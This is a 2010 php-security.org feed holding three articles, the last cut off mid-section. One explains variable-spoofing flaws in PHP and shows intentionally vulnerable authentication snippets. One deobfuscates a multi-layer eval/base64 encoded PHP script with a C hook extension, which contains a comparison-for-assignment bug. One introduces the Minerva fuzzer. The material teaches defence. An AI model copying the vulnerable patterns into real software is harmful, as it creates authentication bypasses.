MOPS Submission 06: Variable Initialization in PHP http://php-security.org/2010/05/17/mops-submission-06-variable-initialization-in-php/ http://php-security.org/2010/05/17/mops-submission-06-variable-initialization-in-php/#comments Mon, 17 May 2010 13:13:15 +0000 admin http://php-security.org/?p=273 Today we want to present you the sixth external MOPS submission. It is the second article sent in by Jakub Vrana. This one is about variable initialization in PHP.

Variable initialization in PHP

Jakub Vrana <vrana [at] php.net>, 2010-03-31

Introduction

Consider the following code:

<?php
if (authUser($_POST["login"], $_POST["password"])) {
    $auth = true;
}
if ($auth) {
    echo "Secret\n";
}
?>

You can easily spot the vulnerability in it. The $auth variable is not initialized in all cases so it can be spoofed from outside. PHP defines a way to handle uninitialized variables (unlike C language for example), they all have the null value. The problem is that the variable can be initialized from other sources:

  • Previous code
  • Included file
  • From outside if register_globals is enabled
  • By using of extract on an untrusted variable

Defense

The defense against this vulnerability is simple – always initialize all variables:

<?php
$auth = false;
if (authUser($_POST["login"], $_POST["password"])) {
    $auth = true;
}
?>

Now if $auth contained anything (or nothing) then it is always reset to false. It is a good idea to initialize variables unconditionally. The following code would work but it is not so robust:

<?php
if (authUser($_POST["login"], $_POST["password"])) {
    $auth = true;
} else {
    $auth = false;
}
?>

Now consider that someone would like to check also the IP address and do it in this way:

<?php
if ($_SERVER["REMOTE_ADDR"] == "127.0.0.1") {
    if (authUser($_POST["login"], $_POST["password"])) {
        $auth = true;
    }
} else {
    $auth = false;
}
?>

The $auth variable can be spoofed again.

Note: The attacker must know the variable name to spoof – he can guess it, get it from some error message, brute-force it, but most commonly he gets it from the source code (open-source applications or a former employee).

Disabling register_globals

It is important to mention that disabling register_globals is not a defense against this attack. It only closes the most common attack vector. It is of course a good idea to disable it but good applications that initialize all variables work independently of register_globals value. Thus, it is not necessary to emulate disabling of register_globals by some variation of the following code:

<?php
// never use this kind of code
if (ini_get("register_globals")) {
    foreach ($_REQUEST as $key =&gt; $val) {
        unset($$key);
    }
}
?>

Spotting of uninitialized variables

PHP has a mechanism to spot uninitialized variables – it issues E_NOTICE level error with most uses of uninitialized variables. There are however some problems with it:

  1. It does not warn about assigning to an uninitialized array.
  2. It warns about accessing non-existing index in properly initialized array.
  3. It is issued in runtime.

E_NOTICE does not warn about assigning to an uninitialized array

The first problem is most serious, consider the following code:

<?php
$config["password"] = "pwd";
if (isset($_POST["password"]) &amp;&amp; $_POST["password"] == $config["password"]) {
    echo "Secret information.\n";
}
?>

It issues no notices if an attacker spoofs the $config variable. If he passes a string then the code is interpreted like this:

<?php
$config[0] = "p";
// $config is a string so [] is used to access bytes in the string
// "password" is converted to number 0 because string positions are always integers
// only one byte can be written to [0] so "pwd" is interpreted as "p"
if (isset($_POST["password"]) &amp;&amp; $_POST["password"] == $config[0]) {
    echo "Secret information.\n";
}
?>

Now it is enough to guess the first character of password and send it along with spoofed $config.

E_NOTICE warns about accessing non-existing index in properly initialized array

The second problem is not security related but code-brevity related. Following code would issue a notice even if it works well and cannot be fooled:

<input name="search" value="<?php echo htmlspecialchars((string) $_GET["search"]); ?>" />

With notices enabled, we must rewrite it to a longer code with the same functionality:

<input name="search" value="<?php
if (isset($_GET["search"])) {
    echo htmlspecialchars((string) $_GET["search"]);
}
?>" />

Another example of this thoroughness – following code is perfectly valid and does what we expect from it (count group members):

<?php
$groups = array();
foreach (getData() as $data) {
    $groups[$data["id_group"]]++;
}
?>

With notices enabled, it must be rewritten like this:

<?php
$groups = array();
foreach (getData() as $data) {
    if (!isset($groups[$data["id_group"]])) {
        $groups[$data["id_group"]] = 0;
    } else {
        $groups[$data["id_group"]]++;
    }
}
?>

I would not say that this code is more clear and less error-prone (there is already one error included).

E_NOTICE is issued in runtime

The third problem of notices is security-related. If some usage of uninitialized variable is not spotted during the development then an attacker can use it. It is nice that you are informed about the usage of uninitialized variable from the error log but if it is used for an attack then it is too late. It is possible to make notices fatal by set_error_handler but it is not worth it for most applications.

Better spotting of uninitialized variables

I would not recommend disabling notices. However, it does not solve all problems and requires writing of more thorough code as you have seen. Luckily, there is a better way to spot uninitialized variables that solves all three problems of notices. It has a name php-initialized. It is a tool for analyzing PHP source code to spot uninitialized variables. It does not run the code and has some limitations but it can be used to check the code routinely for example after refactoring or before commit.

The biggest limitation is that only the current block is considered as the variable scope. Thus, the following code would complain about uninitialized $auth:

<?php
if (authUser($_POST["login"], $_POST["login"])) {
    $auth = true;
} else {
    $auth = false;
}
if ($auth) {
    echo "Secret\n";
}
// prints: Uninitialized variable $auth on line 7
?>

It is partially a political decision explained in this article – it is less error-prone to initialize variables unconditionally. Apart this limitation, the supported features covers nearly all parts of PHP.

Note: Author of this article is the main developer of php-initialized.

Do not use $_REQUEST

Variable spoofing does not involve only global variables. The $_REQUEST variable can be filled by other source than a programmer assumes. It is thoroughly explained by Stefan Esser. I would only append that as the contents of $_REQUEST can be affected by request_order since PHP 5.3.0 then an application could not rely on the contents of $_REQUEST and would not run on some configurations.

Summary

Good PHP application should always initialize all variables before usage. It is a good idea to turn off register_globals but a good application should not rely on it. PHP offers an E_NOTICE error level that can spot some uninitialized variables but it is not 100% reliable. Tool php-initialized solves the deficiencies of it.

]]>
http://php-security.org/2010/05/17/mops-submission-06-variable-initialization-in-php/feed/ 3
Article: Decoding a User Space Encoded PHP Script http://php-security.org/2010/05/13/article-decoding-a-user-space-encoded-php-script/ http://php-security.org/2010/05/13/article-decoding-a-user-space-encoded-php-script/#comments Thu, 13 May 2010 12:01:53 +0000 admin http://php-security.org/?p=246 Today we present you a short article about how to decode a PHP file encoded with the php-crypt.com PHP encoder. This article was written today by Stefan Esser after having seen an advertisement for php-crypt in the Xing PHP Development Forum.

Decoding a User Space Encoded PHP Script

Stefan Esser, 2010-05-13

Introduction

Every once in a while a new PHP encryption tool/service pops up and offers PHP “encryption”. Therefore the idea behind php-crypt that was announced today in the PHP Development forum of Xing is nothing new. Infact there are two types of PHP encryption systems source code obfuscators/encryptors/encoders and bytecode obfuscators/encryptors/encoders. The first type is usually implemented in PHP user space and the second type requires a PHP extension written in C/C++ that hooks into the Zend Engine and provides an encryption of the executed Zend Engine bytecode.

PHP-Crypt is one of the type one obfuscators/encryptors/encoders that is implemented in PHP user space only. Because I have yet to see a user space PHP encoding tool that is hard to break I took a quick look into it and present my results here in order to show how useless this type of encrypters is usually.

The encrypted Code

In order to play around with the crypter I wrote a very simple Hello World script in PHP and let it be encoded by the demo version of the php-crypt online encoder.

<?php
echo 'Hello World';
?>

The resulting encoded PHP script looks like this.

<?php
 /* Demo by www.php-crypt.com - Simple Script */
$keystroke1 = base64_decode("d2RyMTU5c3E0YXllejd4Y2duZl90djhubHVrNmpoYmlvMzJtcA==");
eval(gzinflate(base64_decode('hY69DsIgFIVf5QwMENGUuWH0QZTeKrFekgsMxvTdLWlqTBfX8/uNlUOJiSGpEIc0kFa5SOSbVZdnqlwM3lAPesEj1+vifQPoLJzpEUe9KBPx5hjvXasJlSqMcBedZNBtxeCAbbjHDJoy/U/i1PjOK9+ewlns7o/O2N+X+QM=')));
$O0O0O0O0O0O0=$keystroke1[2].$keystroke1[32].$keystroke1[20].$keystroke1[11].$keystroke1[23].$keystroke1[15].$keystroke1[32].$keystroke1[1].$keystroke1[11];
$keystroke2 = $O0O0O0O0O0O0("<84>q^?>BF<80>~An<86>r<87>D<85>pt{sl<81><83>E{y<82>xCwuov|@?z}", -13);
$OO000OO000OO=$keystroke2[16].$keystroke2[12].$keystroke2[31].$keystroke2[23].$keystroke2[18].$keystroke2[24].$keystroke2[9].$keystroke2[20].$keystroke2[11];
$O0000000000O=$keystroke1[30].$keystroke1[9].$keystroke1[6].$keystroke1[11].$keystroke1[27].$keystroke1[8].$keystroke1[19].$keystroke1[1].$keystroke1[11].$keystroke1[15].$keystroke1[32].$keystroke1[1].$keystroke1[11];
eval($OO000OO000OO(base64_decode('LdA3sq
NIAADQy2zVzC8CbGNqIxBGeCdssoVHQAsJaBCcfi
bY5B3gNXsx/f7HdQmC+J/fZbE2LPNf3VRz3fz+Zd
WyQcAtE0W5mzD4aXDstO3EZ5fZ6o1+uM21ozLcG4
oviaCrvdlt4VDbtWhbbhEaS9cHHMupqeDvDT6rqr
daT+HkHxDNJwXmzuOunr217Kp8Lc6Gz6niMUJWgy
aJz2jBt08FFvHcpWZPJ2yX7Fkpp8dwKG4bHJbKI8
uLHi8Pq7zw4KTKlbrcVKdZUIpkRRI+C2raVY29RH
cRvd+0KAJTUYZtNdp0PxuWK4XqIIP07csc7LDjyO
jyHWZUXGkAOc/l5SQwb0FYU4BFAohVOddtT6t13l
Pq0Svrg8TKOgpZFial/NFaFNS9eJUzKWkH+c30MA
5zM+tYk0aOSHEQA1OBi6x2u9y/P+I5GcMYCOsY+1
CUs4+SeZ70eFlOa94otqFgPpBNnqpTRJiZYkr5FC
Tf4GCWd/UdqQ5N0i0HG9+lpL7b4WAakYYFVsookf
GOMJlQVMWfafs5ObbUp+7GE7o0f8u2vYQIkt2QoI
mpqY6NKTTK7hWMnUEhXp6UtY6VSmNVlvoGe5t8QT
8k2zL7MV/7IeH29eab38y7ICMFxMYfrzf92EcFO2
ciagFgZNhUbIH+cgX+fis4EmE20LuXC7TzMeDxag
YZO4Dm41XX3ne693l79ySwtISgE4l/0kI45w39sk
lPQGAJVBKPuVViivYZI+pxpjtFsIJ+HS9S+rTAuk
2pwd1CwVFxxwyeQ8ub5yV1y0VaFCemmxHDSHehEC
fgUpkrUQUqdW9DEbHJRE2WHBnjV6UZTABkfi/qGc
CJ6eQVQjru7w9Pkpcj0U2E1Zpee54WmE1U0M5M8h
TrK/MjN448JrDrrVAtsbvj2GbfHbfvxASzEk/1Hh
FvykLz1J1RiUu+57ywZH3mW+z6buQU8krlkMnluX
+2F+Y92m2s49U1xLLbWCILbHvYNye/D/k+ymdFOa
kaMgzNNbLsZod01KubNKEEUXK7RiUJUgXxV+HU33
DzpZLBfTuPM480nv50NjpMCeiwmxtvHFoqAO7wid
uGmqmaI3fNtiAfRnBlXdsZXKbtXZLEcPwCQutdPN
7gv35+fv79Aw=='
)));
?>

The code uses base64_decode(), gzinflate() and eval(), a lot of base64 encoded strings, some variable function calls and some non printable characters that will cause problems for anyone loading and saving the file in an editor. In order to analyse this encoded script I will use my evalhook PHP extension, which is presented in the next section.

evalhook PHP extension

Whenever encoders like php-crypt have to be analysed the task is usually the same. You take the script, replace all calls to eval() with die() and check what it tries to eval(). When it looks safe you will replace the eval() with the evaluated code and repeat. This is a very stupid and time consuming work, especially when there are multiple wrappers of eval(). Therefore I wrote a short PHP extension called evalhook that helps with this task. The core functionality of this extension is very simple.

static zend_op_array *(*orig_compile_string)(zval *source_string, char *filename TSRMLS_DC);
static zend_bool evalhook_hooked = 0;

static zend_op_array *evalhook_compile_string(zval *source_string, char *filename TSRMLS_DC)
{
    int c, len, yes;
    char *copy;
   
    /* Ignore non string eval() */
    if (Z_TYPE_P(source_string) != IS_STRING) {
        return orig_compile_string(source_string, filename TSRMLS_CC);
    }
   
    len  = Z_STRLEN_P(source_string);
    copy = estrndup(Z_STRVAL_P(source_string), len);
    if (len > strlen(copy)) {
        for (c=0; c<len; c++) if (copy[c] == 0) copy[c] == '?';
    }
   
    printf("Script tries to evaluate the following string.\n");
    printf("----\n");
    printf("%s\n", copy);
    printf("----\nDo you want to allow execution? [y/N]\n");
   
    yes = 0;
    while (1) {
        c = getchar();
        if (c == '\n') break;
        if (c == 'y' || c == 'Y') {
            yes = 1;
        }
    }

    if (yes) {
        return orig_compile_string(source_string, filename TSRMLS_CC);
    }
   
    zend_error(E_ERROR, "evalhook: script abort due to disallowed eval()");
}


PHP_MINIT_FUNCTION(evalhook)
{
    if (evalhook_hooked == 0) {
        evalhook_hooked = 1;
        orig_compile_string = zend_compile_string;
        zend_compile_string = evalhook_compile_string;
    }
    return SUCCESS;
}

PHP_MSHUTDOWN_FUNCTION(evalhook)
{
    if (evalhook_hooked == 1) {
        evalhook_hooked = 0;
        zend_compile_string = orig_compile_string;
    }
    return SUCCESS;
}

This extension just hooks the zend_compile_string() hook inside PHP which is called whenever a string is evaluated. This includes not only eval() but all other kinds of dynamic PHP code evaluation like inside create_function(). You can download your copy of evalhook here.

Deprotection

In order to demonstrate how powerful evalhook is when it comes to remove encoders like php-crypt we will now try to deprotect the above hello world script. We do this by just executing the encoded script with the evalhook extension being loaded.

$ php -d extension=evalhook.so encoded_script.php
Script tries to evaluate the following string.
----
function rotencode($string,$amount) { $key = substr($string, 0, 1); if(strlen($string)==1) { return chr(ord($key) + $amount); } else { return chr(ord($key) + $amount) . rotEncode(substr($string, 1, strlen($string)-1), $amount); }}
----
Do you want to allow execution? [y/N]

We can see that the first eval() just defines a new function that provides ROT encoding. There is nothing dangerous about it so we let it execute. And wait for the next eval().

Script tries to evaluate the following string.
----
eval($OO000OO000OO(base64_decode('LdDJ0mtYAADgl+mqe/+yMMWQ6roLhJhjCodNF47pmAnB03cvevM9wFfsaff7r9eLIIj/+Z2la8He/oFFPsLi9y8Tmuoy25ogP7zh6Cf6sExL7Mmilc8+0DFReWVyUr/tqc5rAyvBevXl+vBMoEblTjwEOfRwLF8uLPUTnP+cPSw7BcOBgZKFlo9EaWsuB/o9FXgceMrUHAupp3AA5KEEjtsJfXvye67b9cw1RXpQD7mg+wwY3bpSY2VcG5uNirnNWmZf5Sd256u95VFDZIMPGdI8PEdkPbdw1+bdUS66mWbDqGfuRdhAzbo1BGw1xYISVSZKYg6K3uNA27m+5la/A6GCzOf7rAylJjkR9skVQmADYqEYPPBTnLNfKC26e2mZj1eZXFlU0KYEKBZlRWxRw4rpcxk2gulBCZ5t8gX1IvMSjKJUG+RLX4EUJpU+D0EFEQo3MilNMBhXOt80IBoxbffz9Um1gjWul4d2g6V2ukDOzRkgJ2u8DlEsdVEcG6F62xRvfWx5hjWtroQV8dQS0OhdtQKxYPzm4BR0t8wnp3TvkE+yo0Uf554Dmec6auec6zRQvCa71u+M5IgnO5GyTj/VsKRY6j5eqPczvhgIPqpPHWRLGW03WB8i39SoZe3nM1P9u5rRF1/V7sB4afiVu2TyXv2069Izwn1Bqf5LClXJ7CS9NF/NKRijf8KyzBgrz1L27AXtJVmUIOm9VW5zF4zWF92XOCjaU6Wl2lLDUJkxF34+951ZHado5ml4gDsmm3VhHTPBDrwWIKu+dGIdPPGRKeUa3No1826QEoTZJwZV0+zpE2f0vOkkfYxv/MH0lmYb/XIhu0p2LuolgyUb/BQPNn+WsiZtVOQOUNaDs2Zm4ZDohifz+PTftkdVsOJAbgt60YRMMjvtNZHjZvkDyc2NXFS4437eDDOYwBwdsOWeSBmuWCzkEWRXEu8zaNdxStQBb4/QMZVYP1JiQlyeImX0mN6tOVt7urc55Hmi/MJFYFGNDgetruQmUms6OMNjO4fhO11+//z59fPz8/e/')));
----
Do you want to allow execution? [y/N]

We can see that the code tries to eval() another piece of code that does eval() again. Infact there is also a call to a variable function inside $OO000OO000OO. This is harmless in this case because it just contains the string gzinflate(). However if the code to decrypt is actually malware you should not allow execution here and first check the content of this variable. Therefore use evalhook() not on malware. For malware you need to hook all “dangerous” functions first.

But in this case we do not deal with malware and therefore we will just allow execution, which will reveal another eval() layer. And therefore we just continue until something changes.

Script tries to evaluate the following string.
----
eval($OO000OO000OO(base64_decode('LdLHrqNIAEDRnxmp3xMLMBm1ekEymTJ+BFObEZhUNphchK+fXszmfsDRLXHWfv0DAEVR/+crz+aSZ/8tymdflF+/XKjZr3ExZFkh7cXJ9aA8/XRFpixr1JadnX1xFTPQlAmky8vcJNhq7ieax2DEe3mbXKlss2ogKzu6boFLuqIbNzftYQqzk4cWi0bnSd51LxRPB6RQeQsiUl2Qj4LLi5HycRW+n2qJMnT6gpYAFWgLjZY7dBRDxjuysOqkJ9XAgd5twGgKFh17BdmZzVdXNX0r25/TSa/7NOjael9fMLDOfZzbWe3LCX26jbeYM2ns+JqfViALRdCdykZwXhrE8CdWWaInEzJsXCVZgJqnTgdjjVu1ZfLXnKzaq4IXBKY3NmqztaIe6KzORjvK62v3ejP4Pnd7EI8JdjYClWYYKVH4uFRsDucb+ikJFVg0GIZXiJlgsXBe5Six7Fj9MLG7FlUV8ZbxkjtP9cXE87l2v7PzyKjYsZvImv5CPBy6p1EJ3GHVf2629ozjmSb8en08WhyJXbrfWu4dhxB8ihjk6NGGbHS9Hb3z8ghQn5RaVwElZpROmpvJCGW/SAFgOfZVHCLlCJfLOiyAKoSydffb5Mcba6ymAIOCM2ACJmMfuqlToMwj9rYTekyH3ChMHVVFq+Qdtt9v5sPPeiqpnDX9+ELheMxq06n8ITjMhzJ0snRBDbFfsT4ksbR4d2AAqS0nHIINptYb3quJ13xoU/D5mMINKmrzjNgZv7WmCK61i/yBx6cGfEICu2WQndEJTyh5qAxC3i81cYySUNR2gdg7XcNAJeiV5ZqPkzp1ouMSn17qiEeg/PQtU55nLXLoPXucRB2KQBer1xTbzZYvqXksopZHn/kxVPLFYJxa0pj7cajFoR5mQh7NIGQ4qV880fwdrA6jhjxPjsQCQZCkLP/58+v7+/v3fw==')));
----
Do you want to allow execution? [y/N]
y
Script tries to evaluate the following string.
----
eval($OO000OO000OO(base64_decode('LZDJjqtGAAB/JtKbEQezNYuiHAAD0wazmJ1LBHQDBrOYtjHw9ZlDLnUsqQqvxePrL9elafp/fJUFwQL/L8LVhPDXH7sKbTI4iqKc/REMT8zKOYZBk78iCLObq7L68UBnLB6org90GE21itQidiwTGl5yEiVZ3MyaTfm9c0hZp2xJO3DBv8KJuOazasFLCHNIaxcrz2uxrpEDuRujZQIzxqslsCoerinmw6I3zWhJVFbzIQA7dQmzBw+5MYQVZSVC4+o/W/ThLBWtOCbYKmZVD5uDtrNub/flFBvtiOrkvGgHlIUoOE4E4UxibgFmjk3vRsmxQVqWvKw+ieHTUBUTX1f4bZsPiSe+COI2OppjTv3QtIvbfbiWIJVCn3VLudffU6IGjAmMCN8WMN5lxR4sq3CvKJhUIrl5yXK2o2ieOLpuESPJDcVVs2+NguXXlvU8mYxPl5kVTZOndVObiXlT4UFPyoKjM+Ogz0CgfQ08a0E/HwH37eot9QO454jdy80K711uptO0d7elLxPrNVw4GuH7ZQd5GZWOrGxpmrmBZA6i4Px+EV2T5q7rm0fUu9MyJNowHXNao0WfKuYnN7dKM3uJ2YAn+5v6TAZKaYtih+xFvEpWV9tMROGO9lervTOwZYIkZRfr6DNZJ0ZcXrTwZBChcU4svkDhdQFgLiNp6vzDON+9OxIG/mGm7cZ9MieQT6NeD8qUWT8Dx7+xmEDvOC+2u45hnKYKgWEvevzMYK8yQBSol3ezzg85iksM590yB72duMhdwPJA1YHyt8DbUnsXpfA1G3Kg9D3RyyCdyCyHW/yhp7avWgj6+hCoegTUh/zz5/v7++//AA==')));
----
Do you want to allow execution? [y/N]
y
Script tries to evaluate the following string.
----
eval($OO000OO000OO(base64_decode('LcTLsmNAAADQn5mqe29ZeISgZtUIIYROB2EzldDe7zdffzdzFgcv7+r7j21TFPW/7897xGf2X4yjNsbfX2b0NIreAAAosOGqch5t6TZI0CJKZZf7ffdNI3R1CY61nVvK62BemMXe4TakGGUrWB2CQI55y+JTYl4I3nTIc+KW6gOEHxUw3KBdveVseKapBETgz0LYjyhyr/VFhndfWDrCzI96USz/sdeY81RSe1zxEjn8NL5Xbb49BqsFQ0IB7WQEA4xxpz84sQ75VhUzgzpXQTGLaRimMb5X8TQ2Ob9kEuoWBS1G5FUeRr5ni9ALmKKaOMdSoBs8OZb23LNACP7nOOaVd8OT7vCLRgAe9txYk4soFwjYGc00sqKRBgo1u+Tz0oAreUD1NdwmsILMSPKrdHw6ekhvPrfl5ODU2ybxKTijZGXooyjRrkbWKtmJ30deiJy5ZbUbN9AxXXYOS8Gm76Ngz07OG03Mvu4d+ujCYd7LIXnZ0C07Q+apq3phAgpPWGg5q2mMbqWm+AhaayI2J7M8KjfL1U+ej0QvKhi1Ih1SWX2rKzkY9EsFVbJCT/Fs6gN/2eJI6tJ55pbU8ojQzFDiPid6m4lGXhx3wYNS9/nEfmAoYKHm34ue7WIPzDrLOvnTVXXAsITk7P4p1ePcF5USBJugvpl9UVbeIpyKGmEho3UOr5rldczdZu64L8hi78TtpF9SAkksEbSXosp9TxVw0ohkchI5kfz6+fn5+ws=')));
----
Do you want to allow execution? [y/N]
y
Script tries to evaluate the following string.
----
eval($OO000OO000OO(base64_decode('LcTJjqJAAADQn5lkusOBKrBQM+kDyCqyyWLJZUIBQsmOiMDXz2Xe4eVzUn/9chwAwP++SPLKhd3fLE+7LP/6fUkFRAZbFA25rGHVv6JVLLDY+YWu8ZqsScUHmECQNW8vp+LizmvDMWRyme5VF/GRHevcP7tsawGuKRrMoArf0AG3JYrQdepIR59mZ7oF9hJ06lYju9gZZgdeNldtsni7vhBSpvDSvJcVlVeSWVO9QVY2jlt5PMDQUYT541VU68+8Wbzzuw7UZ3IP7vG+A7Qq5sm/v9CjSAOh12nCDG/JSZGOk7ikJQw/zQFXrKtAwAhJfiHBzbp1rgKW5xi/rPmxxB7gA6Sfw21zjkSyFcMwBOfWqcVZSPuo4GK5r1d1kpP40QnqqcYyh3PaSt2ywypSbI8zLNkrfXOQUkpJC70HFE2Y0ete8o5MnnJpw0tdzYoMt+xPhMV0iLkwWfTRfIjlQco91Z0hmKmlCYrIElQF/lST96LIr7ExdcBpguu5vgMV+ZLhSfUTt1xu+nCvPUverDmqit4bQZ8e8m7avIhy9qALmhhpCbplmY24+BPyW3gIdiW9DkAYx8Fa2yvDw7M+Pl0sQjCSwuZHGMVp2NO2Neqj/jyp9x3IEg+SB4+YoEjliWVF8efn9/f3959/')));
----
Do you want to allow execution? [y/N]
y
Script tries to evaluate the following string.
----
eval($OO000OO000OO(base64_decode('Lc65bqNAAIDhl1kpsVyAgXAoSgHG3GDGBgw0K06DGQ7DcAxPvym2+btP+oslgZ9/rleSJP/nM02mgmX+5kXW58Xnh5V5RtoboijKoKPgXQa5CoyIdLNdX/q3DKyGtM3NlLbbhc1Lmuxy5hRbdMtlz1/DI9zh981UOE6vwQkiGpJ3KgueYH0FjaYTYZ7o0ikgvtSYs5fgcT6pHia+quBOc5HXaZhih1Uwm8Xk/PE10+6aeLbTWMWoPE0xjrZsMvfxZQ03T5HJUzzO9bBNEIII6OWoFgJ6cpVg2ZDplyFtDaZfo6FClXD2XeinBox4XF5ENQ2IMDQhSKqBciibn1Qf1AK1diR7BQ9+ec2cm3Bol/A+2x7Cb/XiqZ2UaxHrKfAh8BeQFPv10viMG6EA/b5kTStlbuxEDsrmKH02G6PQPSO1EDLdXtFSaPhxWHqYlQMDzMvVkgpQr0pc8eotzQVi2NqH6GAVGa5WddN52ZwU3zU8T4hiRq06rrqMynR+31JHrjPXA10rbgN3r1VZcUpinnIl9HjCFY40daQ1bf35+TgcDt//AA==')));
----
Do you want to allow execution? [y/N]
y
Script tries to evaluate the following string.
----
eval($OO000OO000OO(base64_decode('LcTJboJAAADQn2lSDQdGQJY0PczIvoqDQLk0MKxKBxRE6df30nd41ZL3m7cgAAD8tynyqRKF77IiQ1lt3l0S2cVgQwjVkHI/XdaIB1V/5GZ7MvVWC1GTy/5hVS37YTnHy26pw9KkvK7Urju3PwaTMNkLerFgKAZYxcsKzrjLpRTFD01ZruipxsllQYQIfrGe9tg7h9LMl4ovpbmJ4owYphth9CUPlUbJlY8yfEAGbV/XXKlQahp2N2M8sGUQi92wn06OQW8vju7Pa7tzByzuMTtyqGETGnBdHY6TFlW98EQaezOEkU4PYtVtD01ckmBcPZNYNtcuYbgkx4F3o4Bmll4nzh3BXJUZXfTy6DVJQuvOLBeQiwFZh8GRbd9/pxmWANyGtJPHhnsCvxNbySHyust24rHh+wIDtfbuqRbNDicPTQnmAxp7SiGDFNf/usdFXT8/P9+32+3HHw==')));
----
Do you want to allow execution? [y/N]
y
Script tries to evaluate the following string.
----
eval($OO000OO000OO(base64_decode('LcTJboJAAADQn2miZg6CDFuaHhRHFhEQBga8NCyDIJuIKPj1vfQdHn3F9fLLthmG+W+ZxAMV4G9G0y6jy0USia7XBVuE9vkBwDVWjvBcc4NbyR5SMUQ7t3d9N7XaHBVZcGHLTSBY8oeEnck3TZSCBGnhxka9eBXHGJitSSo/dOV6io5sRKGnqx2n5Uyh1LoS65S/p2Bg/WnO2ifQpsETel4wBE/qG4pnsucIfhlAHSdcOpyMHcIJ2hvQQvWPo3LTOnZIFfWKrBAaD8+F6MaTxs74hLt/2OcjGA/K+STJJrzstAd00qoXi8pg2w0Ni6h7Kc8y1Z16Pg3lbS0DfMrXETtK28ogd0tCBplnnA+B9LNYrVbffw==')));
----
Do you want to allow execution? [y/N]
y
Script tries to evaluate the following string.
----
eval($OO000OO000OO(base64_decode('bY7RSoVAEEDfF+4/TCK4Ql3sRk9SEGT4EBRqRURcNnfEhdVZ1i2V6N9zWXoL5mmYc+bEHX2OEq7g7ua+LnLWkUXR9lxYK1Ye4SIGo3Hf0hClICaIe5pc+s1Uxydnt+HxsS6q56J6S8qmeTyWD3WTvJ+GuxTiP39TPW36Hw+ehGUKuCjHo1scCGgENX4JrSR4Ej5WmOd5b3pz1trVuFCQM89L4ZBHr4Pckq7hkJ1n2eXhYovCticIPlyMsij/9+TMf/Y1u8AkJWpN8EJWyyTfsV8=')));
----
Do you want to allow execution? [y/N]
y
Script tries to evaluate the following string.
----
$found = FALSE;
foreach(array("example.com") as $host){
if(strstr($_SERVER['HTTP_HOST'],$host)) $found = TRUE;
}
if(!$found) exit("Demo on invalid host by www.php-crypt.com");

if(date("Ymd") > 20100523){
echo "Demo expired by www.php-crypt.com";
exit;
}

echo 'Hello World';

----
Do you want to allow execution? [y/N]

As we can see there are a lot of eval() layers, but in the end there is pretty much the original code that was protected. In addition to the original code we also see the domain verification and time limit functionality. It should be obvious that at this point we can just copy the original code and just forget about all the previous layers of protection.

Conclusion

As I have demonstrated php-crypt does not provide any serious challenge when it comes to removing it. And it will never do unless the author comes up with a protection that does not rely on eval(). A future MOPS article by one of my colleagues at SektionEins will show that this is possible.

]]>
http://php-security.org/2010/05/13/article-decoding-a-user-space-encoded-php-script/feed/ 6
MOPS Submission 05 – The Minerva PHP Fuzzer http://php-security.org/2010/05/11/mops-submission-05-the-minerva-php-fuzzer/ http://php-security.org/2010/05/11/mops-submission-05-the-minerva-php-fuzzer/#comments Tue, 11 May 2010 19:29:45 +0000 admin http://php-security.org/?p=224 Today it is time for the fifth external MOPS submission. It it the second submission by Mateusz Kocielski, an article about his PHP fuzzer called Minerva.

Minerva – 1.0

Mateusz Kocielski

Table of contents:

  1. Introduction
  2. Minerva
  3. Future work
  4. Appendix

-[ 1. Introduction

-[[ 1 a) Abstract

Minerva is a PHP fuzzer designed to uncover bugs in PHP internals. This document contains information about its construction, fuzzing approach, as well as the bugs discovered and future work.

-[[ 1 b) Background

Minerva is a fuzzer dedicated for the PHP language. Fuzz testing in brief is a software testing technique that provides a random/invalid data to the program and then checks if the program failed or something unexpected
happened. This technique was proposed 20 years ago by Prof. Barton Miller, he noticed that many UNIX utilities are crashing when random data is provided as an input to them. Historical background on fuzzing can be found at Miller's website [miller]. Through the years fuzz testing has evolved, many techniques was proposed and bunch of software has been released. Now it’s a valid tool for both developers and hackers to discover bugs in the software. Important thing to understand about it is that fuzzing is not substitution of testing, but it may be its notable support.

Minerva is not the first fuzzing tool dedicated for the PHP, some work has been done already. Victor Steiner [steiner] has released the PHP fuzzer as a part of a bigger project – fusil fuzzing framework [fusil], his approach was
passing random arguments into random functions, similar way of reasoning was presented by Lilxam [lilxam]. Passing random arguments to random function is ineffective because PHP cares about types. In case of this fuzzers many function calls fail at the begin because of the bad argument types or the argument number. In 2007 Calcite released PFF (PHP Fuzzing Framework) [pff].

PFF is configurable by template file, where a user can specify the function name and a list of types (string, integer or random which means that integer or string will be chosen), basing on that file, PFF is generating random
function call for PHP. All this fuzzers discovered bugs in PHP interpreter. Minerva approach is generating valid PHP scripts with determined number of function calls. Validity here should be regarded as passing some “almost
correct” arguments to the functions. The code is having the “proof of concept” status, and should be regarded as a material for the future research and development.

-[ 2. Minerva

-[[ 2 a) Description

As it was mentioned before, Minerva bases on the observation that passing random arguments to PHP functions is highly inefficient because in most cases it ends with a type error. Better approach is to care about the types and
generate scripts with "almost correct" arguments. Minerva has got the pre-defined set of initial variables as well as the database of functions with their return type and a type of arguments. Core algorithm is simple and
can be described by following pseudo-code:

1.  script <- ""
2.  X <- Initial set of variables with their types
3.  G <- Fresh variable generator
4.  F <- Function database
5.  for i in 1..n:
6.   f <- GET_RANDOM(F, X)
7.   v <- G()
8.   X <- X u <v, f result type>
9.   script <- script . v . " = " . f call with random arguments from X (but
     with proper types)
10. return script

Function GET_RANDOM from line 6 returns random function from F which arguments can be covered by variables from set X. Initial set of variables is defined in src/minerva.py:generate() function, but can be extended by
providing an init file with proper function. (i.e. function foo() { return "AAAA"; }) and adding foo function to the function database. Generated script is sliced into following sections:

 +-------------------+
 | header            |
 +-------------------+
 | init              |
 +-------------------+
 | generated script  |
 .                   .
 .                   .
 |                   |
 +-------------------+
 | fini              |
 +-------------------+
 | footer            |
 +-------------------+

Header and footer sections are defined by Minerva in src/minerva.py: header() and footer() functions. Init and fini sections are optional and can be provided by user to put there some static content (e.g. some additional
functions).

-[[ 2 b) Configuration file

The function database and default options can be defined in configuration file. Configuration file is organized as follows:

main section

 default_length - number of function calls
 default_output - output script filename
 modules - list of modules
 ignore_functions - list of ignored functions
 init - initial file
 fini - fini file

functions section

 module_name = [
   return_type function_name ( arguments_types ),
   ...
   ];

For syntax details, take a look at example.conf file in conf/ directory. Configuration options could be also passed from the command line. For detailed list run program with "--help" argument.

-[[ 2 c) Discovered bugs

